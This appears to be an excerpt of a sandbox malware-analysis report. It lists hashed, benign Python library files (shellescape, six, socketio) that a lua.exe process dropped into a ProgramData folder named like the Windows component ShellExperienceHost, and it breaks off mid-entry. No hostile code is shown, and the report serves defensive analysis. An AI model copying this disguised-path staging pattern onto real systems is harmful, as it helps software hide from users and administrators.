Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	795
Entropy (8bit):	5.779209984447832
Encrypted:	false
SSDEEP:	24:r6an/2zDU6a9/SPn6ar6a8l6alpnRMcCyzbvtpOHPLYQ0r9qLgfazp:xnuXgd4VxOlpnecHLtk0r9qL84
MD5:	054889DDCF9C4D408CA626A321A757C8
SHA1:	ECDA6713F0F6F39558A3916AD282528AF36BB283
SHA-256:	C7A698D14ADA8EA229F5F003B4EC4E67959DE52162C9934C8677B8A77CBCEBEE
SHA-512:	91C74BEB684C5DBE345BD9E7C30D07AD1B6A6A4C9323C34FAA699F105010C56B50B7ADC688F5D964692AFEFACBD191A18B30EF170211AA250487BB35C0897098
Malicious:	false
Preview:	shellescape-3.8.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..shellescape-3.8.1.dist-info/METADATA,sha256=0JKCtsUacGFBcPFmQFEXZhf6s6YL1HtvJjUZwwsHwW0,2830..shellescape-3.8.1.dist-info/RECORD,,..shellescape-3.8.1.dist-info/WHEEL,sha256=8zNYZbwQSXoB9IfXOjPfeNwvAsALAjffgk27FqvCWbo,110..shellescape-3.8.1.dist-info/top_level.txt,sha256=1nR_M9ikLI5pRQ3rfRuYjdDB9AjP3V9GAQITd5ohg98,12..shellescape/__init__.py,sha256=J9YVVI_M1jo_ZSqrPd7v379OhwJdfj65HyyrDTIGwAU,71..shellescape/__pycache__/__init__.cpython-37.pyc,,..shellescape/__pycache__/main.cpython-37.pyc,,..shellescape/__pycache__/settings.cpython-37.pyc,,..shellescape/main.py,sha256=t8Fy42MZOR3BEYyVPAY1ArIbHG_kJANIH7u3XLGm1fE,435..shellescape/settings.py,sha256=tcr2V8HBzoiMYSqwczFT7HYzKHc6UbR7p7C5Q_LV9T8,494..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\shellescape-3.8.1.dist-info\WHEEL Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	110
Entropy (8bit):	4.810105929829005
Encrypted:	false
SSDEEP:	3:RtEeX7MWcSlVin3hP+tPCCf7irO5S:RtBMwlVi3hWBBwt
MD5:	E810E49A07579615336DFE1362445C07
SHA1:	7C415D7E52F9507D6414824277CFAE91AB5006E7
SHA-256:	F3335865BC10497A01F487D73A33DF78DC2F02C00B0237DF824DBB16ABC259BA
SHA-512:	3422782BB6F30F4CFFC8BA0648F4A18B2A942A602D7F2676C04402B1549B34E50C1F5F5CD12FC495D08A9C0DB82FB78503CA075BC2479F9519960A0F044B1F09
Malicious:	false
Preview:	Wheel-Version: 1.0.Generator: bdist_wheel (0.33.6).Root-Is-Purelib: true.Tag: py2-none-any.Tag: py3-none-any..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\shellescape-3.8.1.dist-info\top_level.txt Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	12
Entropy (8bit):	2.855388542207534
Encrypted:	false
SSDEEP:	3:tpVK:rU
MD5:	125B56D947CE492D89283689EDF02F42
SHA1:	C07F055C2C976AC3332E902B194F5A89546875DB
SHA-256:	D6747F33D8A42C8E69450DEB7D1B988DD0C1F408CFDD5F46010213779A2183DF
SHA-512:	5B8849662E1F88E3FE69B4AAE916D3506C86B0D95C11C75A6AEF6C6A341667D77DC5B1509F8D70478D8042D81A6761FB6127D62965494B1F909979BE0069A75A
Malicious:	false
Preview:	shellescape.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\shellescape\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	71
Entropy (8bit):	4.574416535955888
Encrypted:	false
SSDEEP:	3:TKQWaHMPAtcLaMIQlAyIz1IEMxMXByK:HWaH8aMtlAya5MxMxj
MD5:	F4936A0AE17AD71F92D0ED13F9DECD1F
SHA1:	8F29CFC461163ABD43CE3FE09BFFA21B7F8FF44F
SHA-256:	27D615548FCCD63A3F652AAB3DDEEFDFBF4E87025D7E3EB91F2CAB0D3206C005
SHA-512:	F6683E25F9DDD3EE5AD3E47CABBA04BED64B024D4A9B4D5D743ECFE9E83C17888DC99C7244A6B61C2CBC6419B558BF0B810648BFA09DF0701B18BE888FBD0E6B
Malicious:	false
Preview:	#!/usr/bin/env python.# -- coding: utf-8 --..from .main import quote.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\shellescape\main.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	435
Entropy (8bit):	4.674974009164637
Encrypted:	false
SSDEEP:	12:HtcKy9+xkZM04XJ9C2RX1ePB191/J0KxVcpVQ:moxk34Xrilh0KrcpVQ
MD5:	33941966AC4A93F6BFC7FAECCAC4A393
SHA1:	673E2D4DA9A195D04BBF82BB45C2030E47A831AB
SHA-256:	B7C172E36319391DC1118C953C063502B21B1C6FE42403481FBBB75CB1A6D5F1
SHA-512:	038B5F184672CC0D751DE95882895FC5EB6267457FFE757D459CE3DD19A754A30A3FEBB8F11E90C3704269B3D2D25CAB7E4F83CF94E813D2A1C7D6105236C2A8
Malicious:	false
Preview:	#!/usr/bin/env python.# -- coding: utf-8 --..import re..._find_unsafe = re.compile(r'[^\w@%+=:,./-]').search...def quote(s):. """Return a shell-escaped version of the string s.""". if not s:. return "''". if _find_unsafe(s) is None:. return s.. # use single quotes, and put single quotes into double quotes. # the string $'b is then quoted as '$'"'"'b'. return "'" + s.replace("'", "'\"'\"'") + "'".

C:\ProgramData\ShellExperienceHost\Lib\site-packages\shellescape\settings.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	494
Entropy (8bit):	2.6308671063756015
Encrypted:	false
SSDEEP:	6:HWaH8aMtlAy/SxzE/eo/gSzAsn5ImAGNV1AXWNrxNfn:HtcKyqxo2o/ZzAKWmA+1AmJn
MD5:	23D47206F4E2BA8C050492B769BC9289
SHA1:	8C9926FF331FA74ECDE3AB51EC716B83B5784B87
SHA-256:	B5CAF657C1C1CE888C612AB0733153EC763328773A51B47BA7B0B943F2D5F53F
SHA-512:	66BC29B922520BB4D140E236D20454B7534421489F7E367D5E1653D777AE3F169AF7D99A6F6285B0F0676FDE633F00F43FC02C416BF8EBF449B1282C61F3471E
Malicious:	false
Preview:	#!/usr/bin/env python.# -- coding: utf-8 --..# ------------------------------------------------------------------------------.# Application Name.# ------------------------------------------------------------------------------.app_name = 'shellescape'..# ------------------------------------------------------------------------------.# Version Number.# ------------------------------------------------------------------------------.major_version = "3".minor_version = "8".patch_version = "1"..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\six-1.15.0.dist-info\INSTALLER Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Mn:M
MD5:	365C9BFEB7D89244F2CE01C1DE44CB85
SHA1:	D7A03141D5D6B1E88B6B59EF08B6681DF212C599
SHA-256:	CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
SHA-512:	D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
Malicious:	false
Preview:	pip.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\six-1.15.0.dist-info\LICENSE Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1066
Entropy (8bit):	5.11431191738939
Encrypted:	false
SSDEEP:	24:vrOJH7H0yxgtAHw1hC09QHOsUv4tk4/+dpoaq/FD:vSJrlxEDdQHOs52TSaYFD
MD5:	43CFC9E4AC0E377ACFB9B76F56B8415D
SHA1:	AC6BA16D8833B691BBBDA7C8EB0C06891C78F98F
SHA-256:	8BB850C565AA389FDC16F3A46965AD23D82ADFF60F2393FC2762B63185E8E6C9
SHA-512:	24120CB7C7CC7D5A56FF8F1E9923826A67F0D92BBE5F50DC483603A90CC916E3C04C6DCBB29BFDE78E3D600D29FBB017A3D0CFD3A74F95E065CE53B74FD3776C
Malicious:	false
Preview:	Copyright (c) 2010-2020 Benjamin Peterson..Permission is hereby granted, free of charge, to any person obtaining a copy of.this software and associated documentation files (the "Software"), to deal in.the Software without restriction, including without limitation the rights to.use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of.the Software, and to permit persons to whom the Software is furnished to do so,.subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.CONNECTIO

C:\ProgramData\ShellExperienceHost\Lib\site-packages\six-1.15.0.dist-info\METADATA Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1795
Entropy (8bit):	4.894791503851073
Encrypted:	false
SSDEEP:	48:DxtBcXHyh3JojeGu0Sci0LOkM00Q+d130Oy1X1Zq55c3qsyX/az+J8yg:Dny3kojeGOLd1h27d3WPay+P
MD5:	027F20990F4E3ADD00D10F582113804B
SHA1:	322FC6D4E814F61A5B68FE17CEF05673CAB763E1
SHA-256:	5BAAE5CA878C6475E1EACACFF4D5CDB26D2B8C07FFEBAD2B7BC59D1F94C14FC1
SHA-512:	4E7FE11354D5764ED1E32655F3B64A27B876242FDE8474146977BD5809FAD8E3520AACBCFAA4AEE99C903931DDC68C9E932F0339F6B58D737DC07527EF2D115A
Malicious:	false
Preview:	Metadata-Version: 2.1.Name: six.Version: 1.15.0.Summary: Python 2 and 3 compatibility utilities.Home-page: https://github.com/benjaminp/six.Author: Benjamin Peterson.Author-email: benjamin@python.org.License: MIT.Platform: UNKNOWN.Classifier: Development Status :: 5 - Production/Stable.Classifier: Programming Language :: Python :: 2.Classifier: Programming Language :: Python :: 3.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Topic :: Software Development :: Libraries.Classifier: Topic :: Utilities.Requires-Python: >=2.7, !=3.0., !=3.1., !=3.2.*.... image:: https://img.shields.io/pypi/v/six.svg. :target: https://pypi.org/project/six/. :alt: six on PyPI.... image:: https://travis-ci.org/benjaminp/six.svg?branch=master. :target: https://travis-ci.org/benjaminp/six. :alt: six on TravisCI.... image:: https://readthedocs.org/projects/six/badge/?version=latest. :target: https://six.readthedocs.io/. :alt: six's document

C:\ProgramData\ShellExperienceHost\Lib\site-packages\six-1.15.0.dist-info\RECORD Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	560
Entropy (8bit):	5.846918931919644
Encrypted:	false
SSDEEP:	12:eclQF0a/2zD7QFv/PLrDpTvQFL0oXNNQFkQFXuiXQFl2uQRc7qATZvk:Rgn/2zDCvL/pTW/d4ZDulEce3
MD5:	89131556B1E97370B1F5ED0FE26FED26
SHA1:	FD70200AB3F7A8E5942A31A837AFDD106493683C
SHA-256:	CEFDACB302FB6B63969DBD5A6E42E9C2882C8C76BBF3BC49E122B0630F7D9D33
SHA-512:	3256121B82F8C7D69655DA3772B6FAF39A60B95C282F87AED65BCCBA7A699257CA2084D6157B884202FB6B161F35016F253311E140EFFB1EA71B7B1A784FA1FC
Malicious:	false
Preview:	__pycache__/six.cpython-37.pyc,,..six-1.15.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..six-1.15.0.dist-info/LICENSE,sha256=i7hQxWWqOJ_cFvOkaWWtI9gq3_YPI5P8J2K2MYXo5sk,1066..six-1.15.0.dist-info/METADATA,sha256=W6rlyoeMZHXh6srP9NXNsm0rjAf_660re8WdH5TBT8E,1795..six-1.15.0.dist-info/RECORD,,..six-1.15.0.dist-info/WHEEL,sha256=kGT74LWyRUZrL4VgLh6_g12IeVl_9u9ZVhadrgXZUEY,110..six-1.15.0.dist-info/top_level.txt,sha256=_iVH_iYEtEXnD8nYGQYpYFUvkUW9sEO1GYbkeKSAais,4..six.py,sha256=U4Z_yv534W5CNyjY9i8V1OXY2SjAny8y2L5vDLhhThM,34159..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\six-1.15.0.dist-info\WHEEL Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	110
Entropy (8bit):	4.816968543485036
Encrypted:	false
SSDEEP:	3:RtEeX7MWcSlVitcv6KjP+tPCCf7irO5S:RtBMwlViWZWBBwt
MD5:	D2A91F104288B412DBC67B54DE94E3AC
SHA1:	5132CB7D835D40A81D25A4A1D85667EB13E1A4D3
SHA-256:	9064FBE0B5B245466B2F85602E1EBF835D8879597FF6EF5956169DAE05D95046
SHA-512:	FACDEE18E59E77AEF972A5ACCB343A2EA9DB03F79D226C5827DC4BCDB47D3937FE347CB1F0A2FC48F035643F58737C875FDF1BD935586A98C6966BFA88C7484A
Malicious:	false
Preview:	Wheel-Version: 1.0.Generator: bdist_wheel (0.34.2).Root-Is-Purelib: true.Tag: py2-none-any.Tag: py3-none-any..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\six-1.15.0.dist-info\top_level.txt Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:Bn:Bn
MD5:	5D2DFBEA120F23E84E689374AA2BA84F
SHA1:	CFA698EF88230FBE6862CB300268A3A647ECC71D
SHA-256:	FE2547FE2604B445E70FC9D819062960552F9145BDB043B51986E478A4806A2B
SHA-512:	9B3E66A838BB6B913FA1CB2B84A4D80C6873F3BBE6AEB2D52E1B719A20BD173D6BB2F8BF3DCF134A7B145721620F0DD8A54F2DA27F30E0A812538BD935FC62A8
Malicious:	false
Preview:	six.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\six.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	34159
Entropy (8bit):	4.775691189920932
Encrypted:	false
SSDEEP:	768:ESesVpKbIy/KiYG8Bll2bCx9m+E55VKzlM:teApKbIy/Kip8VO5yG
MD5:	6FC5317A32D2603139A0229C1876FFDF
SHA1:	0DFEC0D1D49F12B6B529D6ED1827D9BB00E30C34
SHA-256:	53867FCAFE77E16E423728D8F62F15D4E5D8D928C09F2F32D8BE6F0CB8614E13
SHA-512:	E70A32609C6EBA33077A569C9A24D11EA0F6ACF05C1DA468E8B4D13751F3D9C1AC0FF74CF6D2138DC5FB23534D2240572C1DF580982F7C8E78C1463BC9C5107A
Malicious:	false
Preview:	# Copyright (c) 2010-2020 Benjamin Peterson.#.# Permission is hereby granted, free of charge, to any person obtaining a copy.# of this software and associated documentation files (the "Software"), to deal.# in the Software without restriction, including without limitation the rights.# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.# copies of the Software, and to permit persons to whom the Software is.# furnished to do so, subject to the following conditions:.#.# The above copyright notice and this permission notice shall be included in all.# copies or substantial portions of the Software..#.# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISI

C:\ProgramData\ShellExperienceHost\Lib\site-packages\socketio\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1529
Entropy (8bit):	4.71554679298688
Encrypted:	false
SSDEEP:	24:k4MiVCCoIivaYGubTIJ3IQUb7M3V95aSC+ta1zD3XYCEmfBb:k4MiVLfuTQNko5hS1zrotmf5
MD5:	7062B0FD6F1171E834CA0AA154D4F9A1
SHA1:	11CDB75326266224C24D42AB78546645BF73C10F
SHA-256:	E6EAB4AC7C52F6AEA693BD3D576F01CBAB8EDFCE226B92FF162BA3216B5A6018
SHA-512:	297FEA1C5DB787527591F399C99F2787CCC62157506B1648E5E6E44064E721075BDB18901DD7C1D61140A78530FCB54916732067EF160224B9EF8FA27C326960
Malicious:	false
Preview:	import sys..from .client import Client.from .base_manager import BaseManager.from .pubsub_manager import PubSubManager.from .kombu_manager import KombuManager.from .redis_manager import RedisManager.from .kafka_manager import KafkaManager.from .zmq_manager import ZmqManager.from .server import Server.from .namespace import Namespace, ClientNamespace.from .middleware import WSGIApp, Middleware.from .tornado import get_tornado_handler.if sys.version_info >= (3, 5): # pragma: no cover. from .asyncio_client import AsyncClient. from .asyncio_server import AsyncServer. from .asyncio_manager import AsyncManager. from .asyncio_namespace import AsyncNamespace, AsyncClientNamespace. from .asyncio_redis_manager import AsyncRedisManager. from .asyncio_aiopika_manager import AsyncAioPikaManager. from .asgi import ASGIApp.else: # pragma: no cover. AsyncClient = None. AsyncServer = None. AsyncManager = None. AsyncNamespace = None. AsyncRedisManager = None. Asy

C:\ProgramData\ShellExperienceHost\Lib\site-packages\socketio\asgi.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1807
Entropy (8bit):	4.301245982771861
Encrypted:	false
SSDEEP:	48:x5e0oDdCBLaEGJxATQv8ulKiXVkK8sMOTknN:3e0gdCxaoT2DV6sMOTsN
MD5:	9036DA7BCAB71921F4A4E2ED8A3A3A9A
SHA1:	88CA581072F41B687D4F6772B9D4432CED01357C
SHA-256:	4E2DFCA54B7D4CC50365F73F97D0C8DD937D979D17A0E2B48234ACCF59BFFB62
SHA-512:	AEC07C2477EDAFD298A58B359047B686AA9D2A476D0E4275CA8AAA4C5709DF82956E94ABE4F23BA16574D7B568E1C14F27905E13502AAC689973E8555FEE2E8E
Malicious:	false
Preview:	import engineio...class ASGIApp(engineio.ASGIApp): # pragma: no cover. """ASGI application middleware for Socket.IO... This middleware dispatches traffic to an Socket.IO application. It can. also serve a list of static files to the client, or forward unrelated. HTTP traffic to another ASGI application... :param socketio_server: The Socket.IO server. Must be an instance of the. ``socketio.AsyncServer`` class.. :param static_files: A dictionary with static file mapping rules. See the. documentation for details on this argument.. :param other_asgi_app: A separate ASGI app that receives all other traffic.. :param socketio_path: The endpoint where the Socket.IO application should. be installed. The default value is appropriate for. most cases.. :param on_startup: function to be called on application startup; can be. coroutine. :param on_sh

C:\ProgramData\ShellExperienceHost\Lib\site-packages\socketio\asyncio_aiopika_manager.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4199
Entropy (8bit):	4.213447658714627
Encrypted:	false
SSDEEP:	48:ENMHMxqGdk9cVl4KMW78d9NY8nNyKncwLAZw4I156CtZBg6JR825RL:yuM69SzId9NY8SXwUAU695
MD5:	6F9A696DFEB0BBE5856A388745E0AEE3
SHA1:	1D6E0E544E0EF5EB5786753B98997499E2E1D6EB
SHA-256:	65F7A8D32490D85B28C99FDAA9D0DC2C6492BCF8C5A9F41E2E68BFA199177CAC
SHA-512:	58AFE33B6F47819876854270851CDD6167E1B5D1C0E27E1F1C306D81DCCF198FD62CE9F7AF2B4CDF3B30DA192ADE536AD64616D81785BB9EC34276EA830A6911
Malicious:	false
Preview:	import asyncio.import pickle..from socketio.asyncio_pubsub_manager import AsyncPubSubManager..try:. import aio_pika.except ImportError:. aio_pika = None...class AsyncAioPikaManager(AsyncPubSubManager): # pragma: no cover. """Client manager that uses aio_pika for inter-process messaging under. asyncio... This class implements a client manager backend for event sharing across. multiple processes, using RabbitMQ.. To use a aio_pika backend, initialize the :class:`Server` instance as. follows::.. url = 'amqp://user:password@hostname:port//'. server = socketio.Server(client_manager=socketio.AsyncAioPikaManager(. url)).. :param url: The connection URL for the backend messaging queue. Example. connection URLs are ``'amqp://guest:guest@localhost:5672//'``. for RabbitMQ.. :param channel: The channel name on which the server sends and receives. notifications. Must be the same in all the serve

C:\ProgramData\ShellExperienceHost\Lib\site-packages\socketio\asyncio_client.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	22225
Entropy (8bit):	4.1743675840903665
Encrypted:	false
SSDEEP:	192:HXHHYhbSCp84rwdS5KJOwdS5SP84rwdS5VJ5PHswpaNhZ8jZmhcZ5p6:3HHEl0hDHPl0U5PHswp88j8M5p6
MD5:	52E767D433778BA48442518C009A9DF9
SHA1:	8EBEF4E3FD32347D3466B7C093FC19BB32D2AA64
SHA-256:	D3B566D655942E3CDEAD44265C9C966C109BA1870D7D6CC604FAD83BFE2BC2B0
SHA-512:	E6FEAF2E6D4BB45D4735946FB4C592D99A87A0ADF017085EFADFCA93F520432478057F7C93243E99D9E2CEB37E370B351791D0D04FBF1180323D9143063ABE01
Malicious:	false
Preview:	import asyncio.import logging.import random..import engineio.import six..from . import client.from . import exceptions.from . import packet..default_logger = logging.getLogger('socketio.client')...class AsyncClient(client.Client):. """A Socket.IO client for asyncio... This class implements a fully compliant Socket.IO web client with support. for websocket and long-polling transports... :param reconnection: ``True`` if the client should automatically attempt to. reconnect to the server after an interruption, or. ``False`` to not reconnect. The default is ``True``.. :param reconnection_attempts: How many reconnection attempts to issue. before giving up, or 0 for infinity attempts.. The default is 0.. :param reconnection_delay: How long to wait in seconds before the first. reconnection attempt. Each successive attempt.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\socketio\asyncio_manager.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2169
Entropy (8bit):	4.080955679974783
Encrypted:	false
SSDEEP:	48:YxiEVNUf8zCbep/C4/ghdpL8zX9rUPC9d:MiEVNUEC9Z85Asd
MD5:	09F9CCDCFCCF8E599C8EC64555B22217
SHA1:	BF02D018E83C3B5A82C0F01022311CD96FB62EED
SHA-256:	474446332F780BBDCA89DDB01DF17C2CCD7022E784A01A3669A3F4994FC29A7E
SHA-512:	B486E9A667A61DE7C5692B489C6BCD6D1CE5348C3D6B2438E8490BD0FEB6B3FA33C4FA6B9D1B81504C780B5C0E76C2865D9E791F9D25785CE249B6094BBDB0D3
Malicious:	false
Preview:	import asyncio..from .base_manager import BaseManager...class AsyncManager(BaseManager):. """Manage a client list for an asyncio server.""". async def can_disconnect(self, sid, namespace):. return self.is_connected(sid, namespace).. async def emit(self, event, data, namespace, room=None, skip_sid=None,. callback=None, **kwargs):. """Emit a message to a single client, a room, or all the clients. connected to the namespace... Note: this method is a coroutine.. """. if namespace not in self.rooms or room not in self.rooms[namespace]:. return. tasks = []. if not isinstance(skip_sid, list):. skip_sid = [skip_sid]. for sid in self.get_participants(namespace, room):. if sid not in skip_sid:. if callback is not None:. id = self._generate_ack_id(sid, namespace, callback). else:. id = None. ta

C:\ProgramData\ShellExperienceHost\Lib\site-packages\socketio\asyncio_namespace.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8240
Entropy (8bit):	4.151906142325659
Encrypted:	false
SSDEEP:	192:fvVmMjTFkvkmDiRCmMeWOzMvVmMjTFkt9DmRz3:fnjmDSUnjasj
MD5:	0538DDA7F44E2788A79829DC451B003B
SHA1:	1D9EFFE37D71354DCA1D017B86AA4178206BC9FA
SHA-256:	BECBFC00450CCBF706282BBD51F17B032F48A250E11D90C2524070A000731C4D
SHA-512:	F287C106907C3353F7C9F2C1D1E744D9AE75D6F46AF34ABB175FDEB6168E25FB514E127907AAD0660C0BCFCC855D66ADEF371A3A147C5CF1694F049093FDEEE6
Malicious:	false
Preview:	import asyncio..from socketio import namespace...class AsyncNamespace(namespace.Namespace):. """Base class for asyncio server-side class-based namespaces... A class-based namespace is a class that contains all the event handlers. for a Socket.IO namespace. The event handlers are methods of the class. with the prefix ``on_``, such as ``on_connect``, ``on_disconnect``,. ``on_message``, ``on_json``, and so on. These can be regular functions or. coroutines... :param namespace: The Socket.IO namespace to be used with all the event. handlers defined in this class. If this argument is. omitted, the default namespace is used.. """. def is_asyncio_based(self):. return True.. async def trigger_event(self, event, *args):. """Dispatch an event to the proper handler method... In the most common usage, this method is not overloaded by subclasses,. as it performs the routing of events to methods. Howev

C:\ProgramData\ShellExperienceHost\Lib\site-packages\socketio\asyncio_pubsub_manager.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7526
Entropy (8bit):	4.129559055329818
Encrypted:	false
SSDEEP:	96:sKCSUqddMsfURPW4aGxmMq+I/72nxvppnZx8BtucAxUk89r9X:sKCS/rcPW4wRWLZx8BIZm
MD5:	63128FBA916E5F9700C11CFA572039C2
SHA1:	A34744984BCEFEE8BD3606EB4F38D60385E7AAB9
SHA-256:	23B1B5FC4A12DDE31D0B47C4B6576D84BE552B1D0669E20CDF8FDC95CADCDB38
SHA-512:	CF504417957B57FCCDF28B45E76B4DDC5054154AC109FAF928F7BBEADA55B9B0C66D7D3AE09A61FBF5B36AE1392CD87A6472468AEFD491DC32BB37E168EA9939
Malicious:	false
Preview:	from functools import partial.import uuid..import json.import pickle.import six..from .asyncio_manager import AsyncManager...class AsyncPubSubManager(AsyncManager):. """Manage a client list attached to a pub/sub backend under asyncio... This is a base class that enables multiple servers to share the list of. clients, with the servers communicating events through a pub/sub backend.. The use of a pub/sub backend also allows any client connected to the. backend to emit events addressed to Socket.IO clients... The actual backends must be implemented by subclasses, this class only. provides a pub/sub generic framework for asyncio applications... :param channel: The channel name on which the server sends and receives. notifications.. """. name = 'asyncpubsub'.. def __init__(self, channel='socketio', write_only=False, logger=None):. super().__init__(). self.channel = channel. self.write_only = write_only. self.hos

C:\ProgramData\ShellExperienceHost\Lib\site-packages\socketio\asyncio_redis_manager.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4090
Entropy (8bit):	4.088688732065454
Encrypted:	false
SSDEEP:	48:HD4id42A6ZVcsQsGaENl1BahMOybyNNKpfxcwLuHEm4wWcWN3Em6fPH:8z2A6ZVcsQX/1BE1ybo5HEfdN3En/
MD5:	13CB96A24B0AC904C161C972B91D327F
SHA1:	36858853C3686AF1C93BBADAEE24629CC5729B01
SHA-256:	7E4D75F2A078AEFC74FACD0BB8DF36E51926D64938D81DBFD124BF315B2B6BBE
SHA-512:	4D2BAD724400DA58BBDD607D4CC17341710A08020D0DEC3A113BEDA2CD3633C24F415BAB5041F9B7DE6C24F20AB2EFA77C7E3F8D3E2571004D706621357F97D5
Malicious:	false
Preview:	import asyncio.import pickle.from urllib.parse import urlparse..try:. import aioredis.except ImportError:. aioredis = None..from .asyncio_pubsub_manager import AsyncPubSubManager...def _parse_redis_url(url):. p = urlparse(url). if p.scheme not in {'redis', 'rediss'}:. raise ValueError('Invalid redis url'). ssl = p.scheme == 'rediss'. host = p.hostname or 'localhost'. port = p.port or 6379. password = p.password. if p.path:. db = int(p.path[1:]). else:. db = 0. return host, port, password, db, ssl...class AsyncRedisManager(AsyncPubSubManager): # pragma: no cover. """Redis based client manager for asyncio servers... This class implements a Redis backend for event sharing across multiple. processes. Only kept here as one more example of how to build a custom. backend, since the kombu backend is perfectly adequate to support a Redis. message queue... To use a Redis backend, initialize the :class:`Server` instance as.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\socketio\asyncio_server.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	27389
Entropy (8bit):	4.128047751880916
Encrypted:	false
SSDEEP:	384:vIMO8xml2ndMnOAl1rd+PHswtl+Ldx07wsHGw:vIMO8El2dMTl1ZK+Ldx07wsHGw
MD5:	72D1096EBB60663D1F828F04F905EF34
SHA1:	14F77117BC0B4EBC8537D551F81F9250A2EAAFDB
SHA-256:	627441A3FEE9E25E933AABAE386834DA38EFC838753C7F4F0078B622E30300FF
SHA-512:	0B682B7B233461A1A40629D587E159230A6D8441451844700FC85F62E345761C15016C0B068B13D2CFDD708AE8B7A6716305C7344B17D0182704D8D4C238F041
Malicious:	false
Preview:	import asyncio..import engineio.import six..from . import asyncio_manager.from . import exceptions.from . import packet.from . import server...class AsyncServer(server.Server):. """A Socket.IO server for asyncio... This class implements a fully compliant Socket.IO web server with support. for websocket and long-polling transports, compatible with the asyncio. framework on Python 3.5 or newer... :param client_manager: The client manager instance that will manage the. client list. When this is omitted, the client list. is stored in an in-memory structure, so the use of. multiple connected servers is not possible.. :param logger: To enable logging set to ``True`` or pass a logger object to. use. To disable logging set to ``False``. Note that fatal. errors are logged even when ``logger`` is ``False``.. :param json: An alternative json module to use for enco

C:\ProgramData\ShellExperienceHost\Lib\site-packages\socketio\base_manager.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6588
Entropy (8bit):	4.241074523709682
Encrypted:	false
SSDEEP:	96:1DILfSt9UXxMi+IMOhPaEC5P+ISf8Bw+jhZ7IYhvMpoU785As0jcQ+LGN:pbHRcC8yPUem8Ejc6N
MD5:	2FBF62F65F4B3D53E86851BB626987C9
